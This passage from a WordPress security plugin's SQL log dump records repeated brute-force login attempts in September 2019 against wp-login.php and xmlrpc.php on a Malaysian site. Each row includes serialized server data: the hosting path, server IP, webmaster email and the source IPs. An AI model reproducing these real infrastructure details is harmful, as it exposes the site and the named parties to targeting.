14:48:17',17740488,19231312,'https://bintara.com.my/wp-login.php',1,0,'167.99.226.184'),(24595,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"34902\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDwekViJhUiKk@yAoelZwAAAYg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568731258.1757\";s:12:\"REQUEST_TIME\";s:10:\"1568731258\";}}','notice','2019-09-17 14:40:59','2019-09-17 14:40:58',18255848,19555376,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.123.55'),(24594,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"34428\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDwd3-mRYMgL5SYt2EG9AAAAUM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568731255.3934\";s:12:\"REQUEST_TIME\";s:10:\"1568731255\";}}','notice','2019-09-17 14:40:56','2019-09-17 14:40:55',17739728,19230400,'https://bintara.com.my/wp-login.php',1,0,'166.62.123.55'),(24593,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.44.163.100\";s:11:\"REMOTE_PORT\";s:5:\"59262\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDwZ0ViJhUiKk@yAoelYwAAAYM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568731239.7517\";s:12:\"REQUEST_TIME\";s:10:\"1568731239\";}}','notice','2019-09-17 14:40:41','2019-09-17 14:40:40',18257040,19556672,'https://bintara.com.my/xmlrpc.php',1,0,'142.44.163.100'),(24592,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.44.163.100\";s:11:\"REMOTE_PORT\";s:5:\"58520\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDwZEViJhUiKk@yAoelYQAAAY8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568731236.7301\";s:12:\"REQUEST_TIME\";s:10:\"1568731236\";}}','notice','2019-09-17 14:40:38','2019-09-17 14:40:37',17740376,19230984,'https://bintara.com.my/wp-login.php',1,0,'142.44.163.100'),(24591,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.95.121\";s:11:\"REMOTE_PORT\";s:5:\"37454\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDu8UViJhUiKk@yAoektQAAAYI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568730865.9486\";s:12:\"REQUEST_TIME\";s:10:\"1568730865\";}}','notice','2019-09-17 14:34:27','2019-09-17 14:34:26',18255848,19555376,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.95.121'),(24590,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.95.121\";s:11:\"REMOTE_PORT\";s:5:\"36976\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDu7n-mRYMgL5SYt2EGjwAAAVg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568730862.8401\";s:12:\"REQUEST_TIME\";s:10:\"1568730862\";}}','notice','2019-09-17 14:34:24','2019-09-17 14:34:23',17740224,19230624,'https://bintara.com.my/wp-login.php',1,0,'139.59.95.121'),(24589,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"50.31.26.18\";s:11:\"REMOTE_PORT\";s:5:\"42593\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDtakViJhUiKk@yAoekDQAAAYs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568730474.1712\";s:12:\"REQUEST_TIME\";s:10:\"1568730474\";}}','notice','2019-09-17 14:27:55','2019-09-17 14:27:54',18255776,19555080,'https://bintara.com.my/xmlrpc.php',1,0,'50.31.26.18'),(24588,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"50.31.26.18\";s:11:\"REMOTE_PORT\";s:5:\"42342\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDtZn-mRYMgL5SYt2EGNgAAAVA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568730470.9638\";s:12:\"REQUEST_TIME\";s:10:\"1568730470\";}}','notice','2019-09-17 14:27:52','2019-09-17 14:27:51',17740144,19230528,'https://bintara.com.my/wp-login.php',1,0,'50.31.26.18'),(24587,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"186.202.161.191\";s:11:\"REMOTE_PORT\";s:5:\"34410\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDq8n-mRYMgL5SYt2EFgwAAAUA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568729842.579\";s:12:\"REQUEST_TIME\";s:10:\"1568729842\";}}','notice','2019-09-17 14:17:24','2019-09-17 